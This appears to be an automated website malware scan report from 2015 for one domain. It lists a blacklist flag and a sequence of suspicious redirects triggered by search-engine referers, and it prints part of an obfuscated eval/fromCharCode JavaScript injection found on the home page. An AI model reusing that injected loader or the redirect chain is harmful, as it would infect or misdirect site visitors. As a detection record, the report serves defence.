Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=riverofalo.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://riverofalo.com/ | 200 OK Content-Length: 5317 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) sp="split";w=window;aq="0"+"x";ff=String;z="y";ff=ff.fromCharCode;try{document["\x62od"+z]^=~1;}catch(d21vd12v){v=123;vzs=false;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,5c,59,59,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,5c,59,59,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,6e,6e,6e,25,6b,5c,6e,5c,6a,24,5b,58,5a,5f,25,5b,5c, Antivirus reports:
| ||
http://riverofalo.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://riverofalo.com/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: riverofalo.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Feb 2015 13:58:54 GMT Location: http://nakashian.mrsstyleseeker.com/new/www/delivery/lg.php?bannerid=10595&campaignid=3311&zoneid=125&loc=http%3A%2F%2Friverofalo.com%2F&referer=http%3A%2F%2Friverofalo.com%2F&cb=1bc667b118 Server: Apache/2.2.29 (Unix) mod_ssl/2.2.29 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 Content-Length: 393 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: GUp=54; path=/; domain=riverofalo.com; expires=Tue, 03-Mar-2015 12:40:54 GMT | suspicious |
URL: http://nakashian.mrsstyleseeker.com/new/www/delivery/lg.php?bannerid=10595&campaignid=3311&zoneid=125&loc=http%3A%2F%2Friverofalo.com%2F&referer=http%3A%2F%2Friverofalo.com%2F&cb=1bc667b118 (imitation of visitor from search engine) GET /new/www/delivery/lg.php?bannerid=10595&campaignid=3311&zoneid=125&loc=http%3A%2F%2Friverofalo.com%2F&referer=http%3A%2F%2Friverofalo.com%2F&cb=1bc667b118 HTTP/1.1 Host: nakashian.mrsstyleseeker.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Feb 2015 13:58:55 GMT Location: http://broughtmaximum.medident-mauritius.com/portfolio-item/607/index.jhtml?pno=98708136&imagen=nakashian.mrsstyleseeker.com&doc=MI0968&ID=tSvwaL&width=2042329672&ver=1.10.4&file=imgmanager Server: Apache Content-Length: 397 Content-Type: text/html; charset=iso-8859-1 Set-Cookie: cjzs=r; path=/; domain=nakashian.mrsstyleseeker.com; expires=Tue, 03-Mar-2015 19:20:55 GMT | suspicious |
URL: http://broughtmaximum.medident-mauritius.com/portfolio-item/607/index.jhtml?pno=98708136&imagen=nakashian.mrsstyleseeker.com&doc=MI0968&ID=tSvwaL&width=2042329672&ver=1.10.4&file=imgmanager (imitation of visitor from search engine) GET /portfolio-item/607/index.jhtml?pno=98708136&imagen=nakashian.mrsstyleseeker.com&doc=MI0968&ID=tSvwaL&width=2042329672&ver=1.10.4&file=imgmanager HTTP/1.1 Host: broughtmaximum.medident-mauritius.com Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Found Connection: close Date: Tue, 24 Feb 2015 13:58:55 GMT Location: http://www.google.com/ Server: Apache Content-Length: 206 Content-Type: text/html; charset=iso-8859-1 | suspicious |